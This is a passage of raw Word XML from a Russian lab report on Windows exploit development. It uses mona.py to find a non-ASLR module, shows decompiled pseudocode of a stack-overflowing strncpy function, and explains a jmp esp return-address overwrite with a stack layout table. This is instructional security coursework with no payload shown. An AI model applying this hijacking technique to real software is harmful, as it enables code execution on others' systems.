      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> поддержка </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve">-образа связана с флагом </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMAGE</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLLCHARACTERISTICS</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DYNAMIC</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BASE</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> (0</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve">0040) в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DllCharacteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> заголовка </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F63FB72" w14:textId="44D0ED2E" w:rsidR="0091401E" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:r w:rsidRPr="0091401E">
        <w:lastRenderedPageBreak/>
        <w:t>Mona.py — это скрипт на Python, который можно использовать для автоматизации и ускорения определенных поисковых операций при разработке эксплойтов (обычно для платформы Windows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D52E6A" w14:textId="73597E8D" w:rsidR="00A96E2A" w:rsidRDefault="0091401E" w:rsidP="00A96E2A">
      <w:r>
        <w:t xml:space="preserve">Поэтому для поиска таких модулей сначала был </w:t>
      </w:r>
      <w:r w:rsidR="007137FD">
        <w:t>установлен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отладчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и сам скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Затем по инструкции из официального репозитория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Corelan</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:t xml:space="preserve">был запущен скрипт </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A" w:rsidRPr="00A96E2A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A" w:rsidRPr="00A96E2A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:t xml:space="preserve">Командой </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A" w:rsidRPr="00A96E2A">
        <w:t>“!mona config -set workingfolder c:\mona\%p”</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:t xml:space="preserve"> можно указать путь к файлу с выходной информацией, а затем командой </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A" w:rsidRPr="00A96E2A">
        <w:t xml:space="preserve">“!mona modules” </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:t xml:space="preserve">запросить информацию о подгружаемых модулях. В результате по столбцу </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:t xml:space="preserve"> можно определить, что технология рандомизации адресов не используется в модуле </w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A" w:rsidRPr="00A96E2A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A" w:rsidRPr="00A96E2A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00A96E2A">
        <w:t>см. рисунок 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF5AD0" w14:textId="77777777" w:rsidR="00A96E2A" w:rsidRDefault="00A96E2A" w:rsidP="00A96E2A"/>
    <w:p w14:paraId="5C804736" w14:textId="77777777" w:rsidR="00A96E2A" w:rsidRDefault="00A96E2A" w:rsidP="00A96E2A">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="367466CD" wp14:editId="2EAC4118">
            <wp:extent cx="6318885" cy="1531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412" t="42559"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6327876" cy="1533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0CE5E" w14:textId="46C45DA6" w:rsidR="00A96E2A" w:rsidRPr="008D1930" w:rsidRDefault="00A96E2A" w:rsidP="00A96E2A">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A96E2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96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Результат запуска </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="008D1930">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFBC9A" w14:textId="77777777" w:rsidR="00E02D80" w:rsidRPr="008D1930" w:rsidRDefault="00E02D80" w:rsidP="00E02D80"/>
    <w:p w14:paraId="6DF2CAE4" w14:textId="0309DECD" w:rsidR="00A96E2A" w:rsidRDefault="00A96E2A" w:rsidP="00A96E2A">
      <w:r>
        <w:t xml:space="preserve">Далее был написан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPython</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>скрипт для выполнения той же функции. Он основан на проверке бита 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:t xml:space="preserve">40 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:t>DllCharacteristics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0040669F">
        <w:t>заголовка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каждого модуля. С кодом скрипта можно ознакомиться в Приложении 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512B0F8" w14:textId="77777777" w:rsidR="00E02D80" w:rsidRDefault="00E02D80" w:rsidP="00A96E2A"/>
    <w:p w14:paraId="7740F498" w14:textId="77777777" w:rsidR="00E02D80" w:rsidRDefault="00E02D80" w:rsidP="00E02D80">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E5F3137" wp14:editId="3A2E7392">
            <wp:extent cx="4810125" cy="13179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7" cy="131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105D" w14:textId="170345CC" w:rsidR="00E02D80" w:rsidRDefault="00E02D80" w:rsidP="00E02D80">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E02D80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E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Результат запуска </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPython</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-скрипта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EC615B" w14:textId="5C635C9B" w:rsidR="00C852E0" w:rsidRDefault="00C852E0" w:rsidP="00C852E0">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Опкоды инструкций передачи управления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCABFC" w14:textId="7BE454E5" w:rsidR="00C852E0" w:rsidRDefault="00C852E0" w:rsidP="00C852E0">
      <w:r>
        <w:t xml:space="preserve">В предыдущей работе была обнаружена уязвимость переполнения буфера на стеке при выполнении функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strncpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C852E0">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>из-за некорректного приведения типов. Псевдокод этой функции представлен на листинге 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0199DD44" w14:textId="77777777" w:rsidR="00A112D4" w:rsidRDefault="00A112D4" w:rsidP="00C852E0"/>
    <w:p w14:paraId="6BF0BE41" w14:textId="0638D62F" w:rsidR="00A112D4" w:rsidRPr="00A112D4" w:rsidRDefault="00A112D4" w:rsidP="00A112D4">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:keepNext/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A112D4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r w:rsidRPr="00A112D4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A112D4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A112D4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003F3080">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A112D4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A112D4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Псевдокод функции с уязвимостью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12D4" w14:paraId="11BFCAA7" w14:textId="77777777" w:rsidTr="00A112D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40128752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>int __cdecl vuln_func_sh_dst(char *Source, int a2, int a3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21DE1CA6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0FDC732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char Destination[2508]; // [esp+1Ch] [ebp-9CCh] BYREF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CFC087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19BC14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memset(Destination, 98, 0x9C4u);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31513E95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 (__int16)a3 &gt; 2500 )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14DAB984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puts("Error format config: data length  is very long");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260BB933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strncpy(Destination, Source, (unsigned __int16)a3);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACC8E81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Destination[(__int16)a3 - 1] = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0483AE74" w14:textId="77777777" w:rsidR="00A112D4" w:rsidRPr="00D0522C" w:rsidRDefault="00A112D4" w:rsidP="00A112D4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printf("buffer: %s\n", Destination);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9517D3" w14:textId="001E08AE" w:rsidR="00A112D4" w:rsidRDefault="00A112D4" w:rsidP="00A112D4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D0522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B7AB6B6" w14:textId="65FBFE0D" w:rsidR="0054546C" w:rsidRDefault="0054546C" w:rsidP="0054546C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F3E705" w14:textId="0F9E4DE3" w:rsidR="0040669F" w:rsidRDefault="0040669F" w:rsidP="0054546C">
      <w:r>
        <w:t xml:space="preserve">Изначально предполагалось применить технику </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="0040669F">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="0040669F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для перехвата потока управления, которая заключается в следующем</w:t>
      </w:r>
      <w:r w:rsidRPr="0040669F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471EA733" w14:textId="49DEB730" w:rsidR="003205B6" w:rsidRPr="00D40160" w:rsidRDefault="003205B6" w:rsidP="0054546C">
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="003205B6">
        <w:t>ереполнение буфера на стеке</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003205B6">
        <w:t>возникает при записи данных сверх границы буфера, расположенного в стековом фрейме функции. Это позволяет перезаписать сохранённый адрес возврата (saved return address). Вмест</w:t>
      </w:r>
      <w:r>
        <w:t>о него записывается адреса</w:t>
      </w:r>
      <w:r w:rsidRPr="003205B6">
        <w:t xml:space="preserve"> jmp esp, присутствующего в памяти</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidRPr="003205B6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="003205B6">
        <w:t>. При выполнении инструкции ret регистр ESP автоматически сдвигается на 4 байта вперёд — на область стека, следующую за адресом возврата, — куда за</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">благовременно помещён шеллкод, а </w:t>
      </w:r>
      <w:r w:rsidRPr="003205B6">
        <w:t>jmp esp перенаправляет выполнение на ESP, передавая управление шеллкоду</w:t>
      </w:r>
      <w:r w:rsidR="00D40160" w:rsidRPr="00D40160">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D40160">
        <w:t>см. схемы 1-2).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7194"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D40160" w14:paraId="5AC76D05" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20850C24" w14:textId="26029800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ESP (EBP-0x9E8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B2F9081" w14:textId="77777777" w:rsidR="00D40160" w:rsidRDefault="00D40160" w:rsidP="0054546C">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="4B116543" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FAE2F96" w14:textId="0FB0665B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EBP-0x9CC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48644E01" w14:textId="4EB4DA33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Destination[0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="6CA38385" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7566A091" w14:textId="7014CC21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EBP-0x9C8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2AC3B9" w14:textId="44195A2C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Destination[4]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="67BF7C89" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F97422" w14:textId="65BEC587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194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17E92F12" w14:textId="0475ED46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D40160" w14:paraId="7CC47234" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38197A0C" w14:textId="4D789001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EBP-0x001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446BF5E0" w14:textId="3B168EE2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Destination[2507]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="3132B166" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5537ED" w14:textId="07B62399" w:rsidR="00D40160" w:rsidRP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EBP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064F7470" w14:textId="2F321F94" w:rsidR="00D40160" w:rsidRPr="00D40160" w:rsidRDefault="00D40160" w:rsidP="0054546C">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Сохраненный </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>EBP (caller)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="4A793B0F" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00CC5F30" w14:textId="63D0804B" w:rsidR="00D40160" w:rsidRDefault="00D40160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</w:t>
            </w:r>
            <w:r w:rsidR="00532CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0x004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6C72B4" w14:textId="6787FD5A" w:rsidR="00D40160" w:rsidRDefault="00532CF3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return address (saved EIP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="4672B925" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27DB8152" w14:textId="5B4E8A1B" w:rsidR="00D40160" w:rsidRDefault="00532CF3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EBP+0x008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFCFC95" w14:textId="26420E82" w:rsidR="00D40160" w:rsidRDefault="00532CF3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char *Sourse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="1AD52B37" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A359230" w14:textId="42902F68" w:rsidR="00D40160" w:rsidRDefault="00532CF3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EBP+0x00C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34361BCC" w14:textId="762C950D" w:rsidR="00D40160" w:rsidRDefault="00532CF3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 a2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D40160" w14:paraId="38146FD7" w14:textId="77777777" w:rsidTr="00532CF3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EE7A91B" w14:textId="5FE2E97C" w:rsidR="00D40160" w:rsidRDefault="00532CF3" w:rsidP="0054546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EBP+0x010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="184F5FA1" w14:textId="1A554D60" w:rsidR="00D40160" w:rsidRDefault="00532CF3" w:rsidP="00532CF3">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
